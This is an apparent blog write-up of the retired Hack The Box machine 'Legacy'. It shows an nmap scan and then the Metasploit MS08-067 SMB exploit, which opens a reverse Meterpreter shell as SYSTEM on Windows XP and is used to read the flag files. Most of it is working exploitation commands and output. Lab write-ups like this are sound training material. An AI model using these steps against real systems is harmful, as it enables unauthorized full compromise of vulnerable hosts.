HTB: Legacy – Writeup


This machine is Legacy from Hack The Box, and is a retired machine. Its IP was

Recon Phase

Start by looking for services

root@kali:~# nmap -T4 -sV
Starting Nmap 7.70 ( ) at 2019-02-09 23:49 GMT
Nmap scan report for
Host is up (0.034s latency).
Not shown: 997 filtered ports
139/tcp  open   netbios-ssn   Microsoft Windows netbios-ssn
445/tcp  open   microsoft-ds  Microsoft Windows XP microsoft-ds
3389/tcp closed ms-wbt-server
Service Info: OSs: Windows, Windows XP; CPE: cpe:/o:microsoft:windows, cpe:/o:microsoft:windows_xp
Service detection performed. Please report any incorrect results at .
Nmap done: 1 IP address (1 host up) scanned in 11.74 seconds


A quick google search led me to MS08-067, and although I'm normally against metasploit, this time it was worth it

root@kali:~# msfconsole
msf > use exploit/windows/smb/ms08_067_netapi
msf exploit(windows/smb/ms08_067_netapi) > options
Module options (exploit/windows/smb/ms08_067_netapi):
   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   RHOST                     yes       The target address
   RPORT    445              yes       The SMB service port (TCP)
   SMBPIPE  BROWSER          yes       The pipe name to use (BROWSER, SRVSVC)
Exploit target:
   Id  Name
   --  ----
   0   Automatic Targeting
msf exploit(windows/smb/ms08_067_netapi) > set RHOST
msf exploit(windows/smb/ms08_067_netapi) > exploit
[*] Started reverse TCP handler on
[*] - Automatically detecting the target...
[*] - Fingerprint: Windows XP - Service Pack 3 - lang:English
[*] - Selected Target: Windows XP SP3 English (AlwaysOn NX)
[*] - Attempting to trigger the vulnerability...
[*] Sending stage (179779 bytes) to
[*] Meterpreter session 1 opened ( -> at 2019-02-10 00:29:03 +0000
meterpreter >

And that's a meterpreter shell

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM

It's system, just need to grab the flags

meterpreter > pwd
C:\documents and settings\john\Desktop
meterpreter > dir
Listing: C:\documents and settings\john\Desktop
Mode              Size  Type  Last modified              Name
----              ----  ----  -------------              ----
100444/r--r--r--  32    fil   2017-03-16 06:19:49 +0000  user.txt
meterpreter > cat user.txt

Now for system

meterpreter > cd '\Documents and Settings\Administrator\Desktop'
meterpreter > dir
Listing: C:\Documents and Settings\Administrator\Desktop
Mode              Size  Type  Last modified              Name
----              ----  ----  -------------              ----
100444/r--r--r--  32    fil   2017-03-16 06:18:50 +0000  root.txt
meterpreter > cat root.txt

Well... that was easy...

Leave a Reply

Your email address will not be published. Required fields are marked *

This site uses Akismet to reduce spam. Learn how your comment data is processed.